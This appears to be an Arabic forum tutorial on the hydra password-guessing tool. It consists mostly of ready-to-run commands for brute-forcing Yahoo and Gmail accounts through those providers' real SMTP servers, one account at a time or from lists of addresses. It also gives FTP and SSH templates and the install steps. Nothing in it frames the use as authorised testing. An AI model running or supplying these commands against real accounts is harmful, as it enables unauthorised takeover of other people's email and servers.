x32x01
أدارة أكتب كود
- بواسطة x32x01 ||
شرح أداة hydra لهجوم التخمين
أداة hydra قوية في الهجوم وسريعة أكثر من باقي الأدوات ويوجد بها الكثير من البروتوكولات التي يمكن تخمينها سوف نبداء في بروتوكول smtp
تخمين حسابات yahoo
الأمر
لتخمين عدة حسابات
smtp gmail
smtp gmail list email
protocol ftp
protocol ftp list username
protocol ssh
protocol ssh list username
التثبيت أو التنصيب
أداة hydra قوية في الهجوم وسريعة أكثر من باقي الأدوات ويوجد بها الكثير من البروتوكولات التي يمكن تخمينها سوف نبداء في بروتوكول smtp
تخمين حسابات yahoo
الأمر
Code:
hydra -S -l [email protected] -P passlist.txt -e ns -V -s 465 smtp.mail.yahoo.com smtp
لتخمين عدة حسابات
Code:
hydra -S -L emaillist.txt -P passlist.txt -e ns -V -s 465 smtp.mail.yahoo.com smtp
smtp gmail
Code:
hydra -S -l [email protected] -P passlist.txt -e ns -V -s 465 smtp.gmail.com smtp
smtp gmail list email
Code:
hydra -S -L [email protected] -P passlist.txt -e ns -V -s 465 smtp.gmail.com smtp
protocol ftp
Code:
hydra -S -l username -P passlist.txt -e ns -V -s 21 (server or ip or host) ftp
protocol ftp list username
Code:
hydra -S -L listusername.txt -P passlist.txt -e ns -V -s 21 (server or ip or host) ftp
protocol ssh
Code:
hydra -S -l username -P passlist.txt -e ns -V -s 22 (server or ip or host) ssh
protocol ssh list username
Code:
hydra -S -L listusername.txt -P passlist.txt -e ns -V -s 22 (server or ip or host) ssh
التثبيت أو التنصيب
Code:
pkg update && pkg upgrade -y
pkg install hydra -y